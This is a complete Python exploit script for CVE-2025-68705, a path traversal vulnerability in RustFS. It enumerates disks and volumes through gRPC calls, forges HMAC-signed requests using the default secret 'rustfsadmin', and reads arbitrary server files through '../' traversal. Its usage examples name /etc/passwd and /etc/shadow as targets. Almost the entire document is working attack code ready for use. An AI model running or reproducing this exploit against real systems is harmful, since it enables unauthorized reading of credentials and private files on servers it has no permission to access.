#!/usr/bin/env python3
"""
CVE-2025-68705 RustFS Path Traversal Exploit

This script exploits a path traversal vulnerability in RustFS that allows
reading arbitrary files on the server.

Author: Security Researcher
CVE: CVE-2025-68705

Usage:
    python exp.py -H <host> -p <port> -f <file_path> [-s <secret>]

Required Arguments:
    -H, --host        Target host IP or hostname
    -p, --port        Target port number
    -f, --file        File path to read (optional with --check-only)

Optional Arguments:
    -s, --secret      Secret key for signature (default: rustfsadmin)
    -o, --offset      File read offset (default: 0)
    -l, --length      Number of bytes to read (default: 4096)
    --check-only      Only check if target is vulnerable

Examples:
    python exp.py -H 192.168.1.128 -p 9000 -f /etc/passwd
    python exp.py -H 192.168.1.128 -p 9000 -f /etc/shadow -s customsecret -o 0 -l 1024
    python exp.py -H 192.168.1.128 -p 9000 --check-only
"""

import argparse
import base64
import hashlib
import hmac
import re
import socket
import sys
import time
from typing import List, Dict, Optional, Tuple

import requests
from h2.connection import H2Connection
from h2.config import H2Configuration
from h2.events import DataReceived, StreamEnded, TrailersReceived


class RustFSExploit:
    """Exploit class for CVE-2025-68705"""

    def __init__(self, host: str, port: int, secret: str):
        """
        Store the connection parameters shared by every request.

        Args:
            host: Target host IP or hostname
            port: Target port number
            secret: Secret key for signature generation
        """
        self.host, self.port, self.secret = host, port, secret

    def grpc_call(self, method_path: str, request_body: bytes = b'\x00\x00\x00\x00\x00') -> Tuple[bytes, Optional[str]]:
        """
        Make a single unary gRPC call over a cleartext HTTP/2 connection.

        A fresh TCP connection is opened for every call and is always closed
        before returning, including when an error occurs part-way through.

        Args:
            method_path: gRPC method path (used as the HTTP/2 ``:path``)
            request_body: Already-framed gRPC request. The default is a
                5-byte prefix with length 0, i.e. an empty message.

        Returns:
            Tuple of (response_body, grpc_status). ``response_body`` is the
            concatenation of all DATA frames received on the stream (callers
            strip the 5-byte gRPC prefix themselves). ``grpc_status`` is the
            ``grpc-status`` trailer as a string, or None when no trailers were
            received. Any exception yields ``(b'', None)``.
        """
        chunks = []
        status = None
        try:
            # The context manager guarantees the socket is closed even when
            # sending, receiving or HTTP/2 parsing raises.
            with socket.create_connection((self.host, self.port), timeout=10) as sock:
                sock.settimeout(5)

                conn = H2Connection(H2Configuration(client_side=True))
                conn.initiate_connection()
                sock.sendall(conn.data_to_send())

                sid = conn.get_next_available_stream_id()

                headers = [
                    (':method', 'POST'),
                    (':scheme', 'http'),
                    (':authority', f'{self.host}:{self.port}'),
                    (':path', method_path),
                    ('content-type', 'application/grpc'),
                    ('authorization', 'rustfs rpc'),
                    ('te', 'trailers')
                ]

                conn.send_headers(sid, headers, end_stream=False)
                conn.send_data(sid, request_body, end_stream=True)
                sock.sendall(conn.data_to_send())

                stream_ended = False
                while not stream_ended:
                    data = sock.recv(65535)
                    if not data:
                        # Peer closed the connection before ending the stream.
                        break
                    for event in conn.receive_data(data):
                        if isinstance(event, DataReceived):
                            chunks.append(event.data)
                            # Return flow-control credit so the peer can keep sending.
                            conn.acknowledge_received_data(
                                event.flow_controlled_length, event.stream_id
                            )
                        elif isinstance(event, TrailersReceived):
                            status = dict(event.headers).get(b'grpc-status', b'').decode()
                        elif isinstance(event, StreamEnded):
                            stream_ended = True
                            break
                    if not stream_ended:
                        # Flush frames queued by h2 (window updates, settings ACKs).
                        sock.sendall(conn.data_to_send())
        except Exception:
            # Best-effort contract: callers treat (b'', None) as "call failed".
            return b'', None

        return b''.join(chunks), status

    @staticmethod
    def _encode_varint(value: int) -> bytes:
        """
        Encode an integer as a varint.

        Args:
            value: Integer value to encode

        Returns:
            Varint encoded bytes
        """
        if value < 0:
            value = (1 << 64) + value
        bytes_list = []
        while value > 0x7F:
            bytes_list.append((value & 0x7F) | 0x80)
            value >>= 7
        bytes_list.append(value)
        return bytes(bytes_list)

    @staticmethod
    def _encode_string_field(field_num: int, value: str) -> bytes:
        """
        Encode a string field for protobuf.

        Args:
            field_num: Field number
            value: String value to encode

        Returns:
            Encoded bytes
        """
        encoded_value = value.encode('utf-8')
        tag = (field_num << 3) | 2
        length = RustFSExploit._encode_varint(len(encoded_value))
        return bytes([tag]) + length + encoded_value

    def get_disks(self) -> List[str]:
        """
        Get the list of disks from the server.

        Calls the ``ServerInfo`` gRPC method, walks the protobuf-style fields
        of the reply looking for field 2 (length-delimited), decodes that
        field's payload with msgpack and collects the first element of every
        entry found at index 7 of the decoded list.

        All errors are swallowed: a failed call, an unexpected reply layout
        or a missing ``msgpack`` package all result in an empty list.

        Returns:
            List of disk paths (empty when nothing could be extracted)
        """
        disks = []
        try:
            body, status = self.grpc_call('/node_service.NodeService/ServerInfo')

            if status == '0' and body and len(body) > 5:
                # Skip the 5-byte gRPC message prefix (flag byte + 4 length bytes).
                data = body[5:]

                # Walk the protobuf fields; the msgpack blob is expected in
                # field 2, wire type 2 (tag byte 0x12).
                # NOTE(review): tags are read as a single byte, so field
                # numbers >= 16 would be misread.
                i = 0
                while i < len(data):
                    # Redundant with the loop condition; kept as-is.
                    if i >= len(data):
                        break
                    tag = data[i]
                    i += 1

                    field_num = tag >> 3
                    wire_type = tag & 0x07

                    if field_num == 2 and wire_type == 2:
                        # Decode the varint length prefix of the field
                        length = 0
                        shift = 0
                        while i < len(data):
                            byte = data[i]
                            i += 1
                            length |= (byte & 0x7F) << shift
                            if not (byte & 0x80):
                                break
                            shift += 7

                        # Only decode when the declared payload fits in the reply.
                        if i + length <= len(data):
                            msgpack_data = data[i:i + length]

                            try:
                                # Imported lazily; an ImportError is swallowed
                                # by the handler below and yields no disks.
                                import msgpack
                                unpacked = msgpack.unpackb(msgpack_data, raw=False)

                                if isinstance(unpacked, list) and len(unpacked) > 7:
                                    # Extract disk list (index 7); each entry is
                                    # a list whose first element is the disk path
                                    if isinstance(unpacked[7], list):
                                        for disk_info in unpacked[7]:
                                            if isinstance(disk_info, list) and len(disk_info) > 0:
                                                disk_path = disk_info[0]
                                                if isinstance(disk_path, str) and disk_path:
                                                    disks.append(disk_path)
                                    break
                            except Exception:
                                pass
                        # Field 2 is inspected at most once, whether or not it decoded.
                        break
                    elif wire_type == 0:
                        # Skip a varint value: continuation bytes, then the final byte.
                        while i < len(data) and (data[i] & 0x80):
                            i += 1
                        i += 1
                    elif wire_type == 2:
                        # Skip a length-delimited field: varint length, then payload.
                        length = 0
                        shift = 0
                        while i < len(data):
                            byte = data[i]
                            i += 1
                            length |= (byte & 0x7F) << shift
                            if not (byte & 0x80):
                                break
                            shift += 7
                        i += length
                    # NOTE(review): other wire types (e.g. fixed32/fixed64) are
                    # not skipped; their payload bytes are then read as tags.

        except Exception:
            pass

        return disks

    def get_volumes(self, disk: str) -> List[str]:
        """
        List the volume names reported for one disk.

        Sends a ``ListVolumes`` gRPC request whose only field is the disk
        path, then scrapes names out of the raw reply: first every
        ``"name": "<value>"`` pair, and if none is found, every quoted token
        made of letters, digits, ``_``, ``.`` and ``-``.

        Args:
            disk: Disk path

        Returns:
            List of volume names (empty on any failure)
        """
        found = []
        try:
            payload = self._encode_string_field(1, disk)

            # gRPC frame prefix: compression flag 0 + 4-byte big-endian length.
            prefix = b'\x00' + (len(payload) & 0xFFFFFFFF).to_bytes(4, 'big')

            body, status = self.grpc_call(
                '/node_service.NodeService/ListVolumes', prefix + payload
            )

            if status == '0' and body and len(body) > 5:
                # Drop the reply's own 5-byte frame prefix.
                data = body[5:]

                found = [
                    name.decode()
                    for name in re.findall(rb'"name"\s*:\s*"([^"]+)"', data)
                ]

                # Fallback: any quoted identifier-like token.
                if not found:
                    found = [
                        token.decode()
                        for token in re.findall(rb'"([a-zA-Z0-9_.-]+)"', data)
                    ]

        except Exception:
            pass

        return found

    def get_disk_and_volume_info(self) -> Dict:
        """
        Collect every disk together with the volumes found on it.

        Returns:
            Dictionary with ``"host"`` (``"<host>:<port>"``) and ``"disks"``,
            a list of ``{"path": ..., "volumes": [...]}`` entries in the
            order the disks were reported. ``"disks"`` is empty when no disk
            was found.
        """
        return {
            "host": f"{self.host}:{self.port}",
            "disks": [
                {"path": disk, "volumes": self.get_volumes(disk)}
                for disk in (self.get_disks() or ())
            ],
        }

    @staticmethod
    def _generate_signature(url: str, method: str, timestamp: str, secret: str) -> str:
        """
        Generate HMAC-SHA256 signature for the request.

        Args:
            url: Request URL path
            method: HTTP method
            timestamp: Unix timestamp
            secret: Secret key

        Returns:
            Base64 encoded signature
        """
        data = f"{url}|{method}|{timestamp}"
        signature = hmac.new(
            secret.encode(),
            data.encode(),
            hashlib.sha256
        ).digest()
        return base64.b64encode(signature).decode()

    def read_file(self, disk: str, volume: str, file_path: str, offset: int = 0, length: int = 4096) -> Optional[str]:
        """
        Issue one signed ``read_file_stream`` GET request and return its body.

        The values are interpolated into the query string as-is (no URL
        encoding), and the signature is computed over that exact path+query.

        Args:
            disk: Disk path
            volume: Volume name
            file_path: Path to the file to read (can use ../ for traversal)
            offset: File read offset
            length: Number of bytes to read

        Returns:
            Response text on HTTP 200, otherwise None (non-200 status or any
            exception raised while performing the request)
        """
        print(f"[*] Exploiting CVE-2025-68705 against {self.host}:{self.port}")
        print(f"[*] Reading file: {file_path}")

        query = f"disk={disk}&volume={volume}&path={file_path}&offset={offset}&length={length}"
        url = f"/rustfs/rpc/read_file_stream?{query}"
        full_url = f"http://{self.host}:{self.port}{url}"

        # The same timestamp must be signed and sent.
        timestamp = str(int(time.time()))
        headers = {
            "x-rustfs-signature": self._generate_signature(url, "GET", timestamp, self.secret),
            "x-rustfs-timestamp": timestamp
        }

        try:
            response = requests.get(full_url, headers=headers, timeout=10)

            if response.status_code != 200:
                print(f"[-] Request failed with status code: {response.status_code}")
                return None
            return response.text

        except Exception as e:
            print(f"[-] Error during request: {e}")
            return None

    def check_vulnerability(self) -> bool:
        """
        Probe the target by requesting /etc/passwd through a traversal path.

        For each disk that has at least one volume, the first volume is used
        to request the first 700 bytes; the target is considered vulnerable
        as soon as a reply contains ``root:x:0:0``.

        Returns:
            True if vulnerable, False otherwise
        """
        print("[*] Checking for CVE-2025-68705 vulnerability...")

        candidates = self.get_disk_and_volume_info()["disks"]
        if not candidates:
            print("[-] No disks found on target")
            return False

        for entry in candidates:
            disk, volumes = entry["path"], entry["volumes"]
            if volumes:
                content = self.read_file(
                    disk, volumes[0], "../../../../etc/passwd", offset=0, length=700
                )
                if content and "root:x:0:0" in content:
                    print("[+] Target is VULNERABLE!")
                    return True

        print("[-] Target does not appear to be vulnerable")
        return False

    def exploit(self, file_path: str, offset: int = 0, length: int = 4096) -> Optional[str]:
        """
        Read a file from the target via the traversal path.

        Disks are tried in the order they were reported; for each disk with
        at least one volume, the first volume is used and ``file_path`` is
        prefixed with ``../../../../``. The first non-empty reply wins.

        Args:
            file_path: Path to the file to read
            offset: File read offset (default: 0)
            length: Number of bytes to read (default: 4096)

        Returns:
            File content or None if failed
        """
        candidates = self.get_disk_and_volume_info()["disks"]
        if not candidates:
            print("[-] No disks found on target")
            return None

        traversal_path = f"../../../../{file_path}"
        for entry in candidates:
            disk, volumes = entry["path"], entry["volumes"]
            if volumes:
                content = self.read_file(disk, volumes[0], traversal_path, offset, length)
                if content:
                    print("[+] Successfully read file!")
                    return content

        print("[-] Failed to read file")
        return None


def main():
    """
    Command-line entry point.

    Parses the arguments, always runs the vulnerability check first and,
    unless ``--check-only`` is given, then reads the requested file and
    prints it.

    Exit status: 0 on success (check confirmed, or file read), 1 on
    failure, 2 on invalid command-line usage (argparse convention),
    including a missing ``--file`` when ``--check-only`` is not given.
    """
    parser = argparse.ArgumentParser(
        description="CVE-2025-68705 RustFS Path Traversal Exploit",
        formatter_class=argparse.RawDescriptionHelpFormatter,
        epilog="""
Examples:
  python exp.py -H 192.168.1.128 -p 9000 -f /etc/passwd -s rustfsadmin
  python exp.py --host 192.168.1.128 --port 9000 --file /etc/shadow --secret rustfsadmin --offset 0 --length 1024
  python exp.py -H 192.168.1.128 -p 9000 --check-only -s rustfsadmin
        """
    )

    parser.add_argument(
        '-H', '--host',
        required=True,
        help='Target host IP or hostname'
    )
    parser.add_argument(
        '-p', '--port',
        type=int,
        required=True,
        help='Target port number'
    )
    parser.add_argument(
        '-f', '--file',
        help='File path to read (required unless --check-only is given)'
    )
    parser.add_argument(
        '-o', '--offset',
        type=int,
        default=0,
        help='File read offset (default: 0)'
    )
    parser.add_argument(
        '-l', '--length',
        type=int,
        default=4096,
        help='Number of bytes to read (default: 4096)'
    )
    parser.add_argument(
        '-s', '--secret',
        default='rustfsadmin',
        help='Secret key for signature generation (default: rustfsadmin)'
    )
    parser.add_argument(
        '--check-only',
        action='store_true',
        help='Only check if target is vulnerable, do not read file'
    )

    args = parser.parse_args()

    # Without this guard a missing -f would be formatted into the request
    # as the literal path "None".
    if not args.check_only and not args.file:
        parser.error("-f/--file is required unless --check-only is given")

    # Initialize exploit
    exploit = RustFSExploit(args.host, args.port, args.secret)

    print(f"[*] Target: {args.host}:{args.port}")
    print(f"[*] Secret: {args.secret}")
    print("-" * 50)

    if args.check_only:
        # Only check vulnerability
        if exploit.check_vulnerability():
            print("[+] Vulnerability confirmed!")
            sys.exit(0)
        else:
            print("[-] Vulnerability not found")
            sys.exit(1)
    else:
        # Check and exploit
        if exploit.check_vulnerability():
            print("-" * 50)
            result = exploit.exploit(args.file, args.offset, args.length)
            if result:
                print(f"\n[+] File content (offset={args.offset}, length={args.length}):")
                print("-" * 50)
                print(result)
                print("-" * 50)
                sys.exit(0)

    sys.exit(1)


# Run the CLI only when executed as a script, not when imported as a module.
if __name__ == "__main__":
    main()
